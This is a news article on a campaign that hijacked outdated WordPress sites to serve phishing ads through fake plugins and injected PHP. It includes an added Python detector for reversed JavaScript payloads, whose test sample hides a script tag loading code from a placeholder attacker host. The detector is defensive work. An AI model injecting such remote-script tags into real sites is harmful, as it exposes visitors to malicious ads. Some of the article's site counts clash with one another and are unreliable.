Cybercriminals are using phishing advertising to target old WordPress sites

WordPress sites using outdated versions of the world’s most popular content management system (CMS) are being targeted by cybercriminals who want to exploit them to serve dangerous phishing advertising.

Cybernews experts discovered this new attack approach during a routine scanning operation in December of last year. The researchers uncovered an illicit money-making operation that had breached hundreds of WordPress-powered sites that were either running outdated versions or did not have the necessary security plugins in place at the time of the discovery.

In the initial act of intrusion, cybercriminals used vulnerabilities and credential stuffing attacks to infiltrate the susceptible websites. These sites then became command and control hubs for fraudulent adverts, activated either by scripts executed in the second phase or by a click on a link that a PHP script had injected into the WordPress installations of the targeted sites. Cybernews discovered a surprising number of malicious PHP programs posing as legitimate WordPress plugins.

Cybernews’ Vincentas Baubonis explained how the suspicious JavaScript code encouraged the researchers to dig further:

“As a result of significant obfuscation and strange deployment circumstances, this JavaScript code drew the attention of the team. Legitimate creators and malicious actors alike use code obfuscation to thwart attempts at reverse engineering. The real payload was reversed in order to hide dangerous code.”
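The string reversal described in the quote can be checked for when reviewing JavaScript found on a site. The following scanner is an added example, not Cybernews' tooling or code from the article; the indicator list, the function name and the sample script are assumptions constructed for illustration.

```python
import re

# Assumed indicator list (not from the article): tokens that commonly appear
# in injected ad or redirect code once a string has been un-reversed.
INDICATORS = ("<script", "<iframe", "http://", "https://", "eval(",
              "document.write", "fromcharcode")
MIN_LEN = 8  # ignore short literals such as "" or "utf-8"

# Single- or double-quoted string literals, honouring backslash escapes.
STRING_LITERAL = re.compile(r'(["\'])((?:\\.|(?!\1).)*)\1')


def find_reversed_payloads(source):
    """Return literals whose reversed form reveals indicators that the
    forward form does not contain (i.e. the reversal was hiding them)."""
    findings = []
    for match in STRING_LITERAL.finditer(source):
        literal = match.group(2)
        if len(literal) < MIN_LEN:
            continue
        decoded = literal[::-1]
        hits = [tok for tok in INDICATORS
                if tok in decoded.lower() and tok not in literal.lower()]
        if hits:
            line = source.count("\n", 0, match.start()) + 1
            findings.append({"line": line, "decoded": decoded,
                             "indicators": hits})
    return findings


# Constructed sample (hypothetical host under the reserved .test TLD).
# The payload is reversed at build time so the stored literal is unreadable.
PAYLOAD = "<script src='https://c2.example.test/ad.js'></script>"
SAMPLE_JS = (
    'var greeting = "Hello world, welcome";\n'
    'var p = "' + PAYLOAD[::-1] + '";\n'
    'document.write(p.split("").reverse().join(""));\n'
)

if __name__ == "__main__":
    for f in find_reversed_payloads(SAMPLE_JS):
        print(f"line {f['line']}: {f['indicators']} -> {f['decoded']}")
```

A plain forward URL or script tag is deliberately not reported; only literals that become suspicious after reversal are flagged, which keeps noise low on ordinary theme and plugin code.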

Focusing on WordPress blogs that are more than a year old

Automated attacks against older WordPress sites were then launched, using malicious PHP scripts disguised as genuine plugins to inject HTML references leading to the previously compromised command and control sites.

In the first stage of the attack, four sites were infiltrated and used to host C&C scripts, while the second stage mostly targeted WordPress sites running older versions 3.5.1 to 4.9.1, according to Cybernews. At least 560 WordPress sites were determined to be infected, and 382 of them were compelled to execute malicious code, according to the publication’s research team. However, hackers were unable to make money from all of the hijacked sites, either due to human error or WordPress’ built-in security features.

Just seven out of 10 sites were determined to be displaying harmful advertisements, possibly because of technical reasons or built-in WordPress theme protection that stopped the code from executing in areas it wasn’t meant to.

The US has the most hacked websites (201), followed by France (62), Germany (51) and the United Kingdom (50). (34). In terms of web hosting services, GoDaddy came out on top with 42 websites, followed by WebsiteWelcome (30) and OVH ISP (27). When the data is broken down by ISP, Unified Layer came in second with 53 compromised sites and GoDaddy came in third with 43.

The most recent article from Cybernews serves as a timely reminder of the necessity of maintaining an updated WordPress site. If you’re always forgetting to make updates to your WordPress site, you may be better off signing up for a managed WordPress solution.